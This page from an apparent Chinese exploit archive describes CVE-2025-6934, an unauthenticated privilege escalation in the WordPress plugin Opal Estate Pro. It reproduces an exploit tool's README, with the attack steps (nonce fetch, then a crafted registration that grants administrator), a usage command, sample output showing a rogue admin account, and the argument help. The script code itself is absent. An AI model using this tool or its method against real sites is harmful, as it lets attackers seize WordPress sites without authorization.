关联漏洞
标题:
WordPress plugin Opal Estate Pro 安全漏洞
(CVE-2025-6934)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Opal Estate Pro 1.7.5及之前版本存在安全漏洞,该漏洞源于on_regiser_user函数缺少角色限制,可能导致权限提升。
描述
Opal Estate Pro <= 1.7.5 - Unauthenticated Privilege Escalation
介绍
# 🛡️ CVE-2025-6934 - Unauthenticated Privilege Escalation in Opal Estate Pro
## 📝 Description
The **Opal Estate Pro – Property Management and Submission** plugin for WordPress, used by the **FullHouse - Real Estate Responsive WordPress Theme**, is vulnerable to **Privilege Escalation** in all versions up to and including **1.7.5**.
---
- **CVE ID:** CVE-2025-6934
- **CVSS Score:** 9.8 (Critical)
- **Published:** June 30, 2025
---
## ⚙️ Script Information
This Python exploit automates the privilege escalation process by:
- Verifying the vulnerable plugin version via `readme.txt`.
- Fetching the required **nonce** from the registration page.
- Sending a crafted registration request to gain **Administrator access**.
---
## 🚀 Usage Example
```bash
python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail NxploitBot@gmail.com -password nxp1234
```
---
## 📤 Sample Output
```
[•] Plugin Version Check:
[+] Vulnerable version detected: 1.7.5
[•] Exploit Attempt Started
[+] Nonce Found: 70dd70630b
[+] HTTP Status: 200
[✔] Exploit Successful!
--------------------------
Username : nxploitedadmin
Email : NxploitBot@gmail.com
Password : nxp1234
Role : administrator
--------------------------
Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited
```
---
## 🛠️ Arguments & Help
```bash
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD
CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://site.com/path/)
-mail, --newmail NEWMAIL
Email to register as admin
-password, --newpassword NEWPASSWORD
Password for new admin user
```
---
## ⚠️ Disclaimer
This script is for **educational and authorized security testing** purposes only.
Unauthorized use of this tool against targets without consent is strictly prohibited.
---
**_By: Khaled_alenazi (Nxploited)_**
文件快照
[4.0K] /data/pocs/3659a356208e75355c47545756a501c1cd2a9a50
├── [3.8K] CVE-2025-6934.py
├── [1.1K] LICENSE
├── [247K] NxPloitedCVE.PNG
├── [2.0K] README.md
└── [ 24] requirements.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。